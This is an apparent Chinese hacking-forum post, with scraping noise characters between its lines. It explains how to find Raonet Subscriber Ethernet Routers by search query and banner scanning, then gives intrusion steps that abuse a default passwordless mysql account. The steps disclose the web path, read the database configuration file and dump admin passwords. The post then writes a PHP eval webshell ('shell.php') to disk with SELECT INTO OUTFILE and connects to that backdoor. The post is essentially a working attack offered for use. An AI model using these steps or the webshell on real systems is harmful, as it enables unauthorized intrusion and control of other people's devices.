寻找存在漏洞的路由器方法:
) J9 Y. s1 E. o
& P; L, _5 ?8 z8 s1:google搜索'Raonet Subscriber Ethernet Router'
3 _1 a: q3 d* \% _% g# n
* j5 X% _+ l/ F8 v5 o8 O% S2 @2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
* M0 f9 m, q1 I, g# I0 [" ~! f+ d( G! k" a
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
0 c. z( q" e; o3 v t; R: V. N* Q# P" J% j N; v
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
- ~; T- @6 H5 w' S3 M2 {; x
2 N) b$ A& T0 P K5 ?6 w% m# }; [
/ J3 w; W# Y4 r) S; A( N& q f& N* J
% O; z0 X" z* u P& L7 n& ?" O U入侵步骤:
* U2 O* S, g1 G4 ^! E1 s9 ^# P W! S3 h
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php9 n6 \6 g& e) B: y5 A; N" c
0 f( f) {0 d; D5 ~2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc. Y; p& r7 Z- ~4 k- J- K1 K
3:得到密码后连接,查看GUI管理密码:
1 ?8 w3 z$ z! G3 ]9 A. }0 V7 Buse ser_500& m3 U0 F0 m/ \5 ^ J! `
select id,passwd from user;
$ E# `9 F1 U* w) x/ u Y2 C* @% H8 K4:通过数据库写入webshell,执行命令:) F5 v$ ^, S2 ~ [
use mysql;
+ z* }. p! ]6 u& ]create table ok(cmd TEXT);0 [! j6 K$ H3 b9 W% \. o
insert into ok values("<?php @eval($_POST[cmd])?>");
. y$ `& Z( h( y, w9 a" Vselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";) }3 T) G0 R. a+ r8 Z6 P
drop table ok;4 k5 m! f S6 u3 E5 Q$ q9 J
4 Y/ L4 |/ [( s x5:连接后门shell.php 4 y+ Y9 b: N/ X
; o, B) Z+ D( g. B0 _- G
6. 搞定!
9 |% a* @* q# u5 B1 C4 K" {8 o# L: o/ R/ H4 Z+ ]* e7 N1 i
|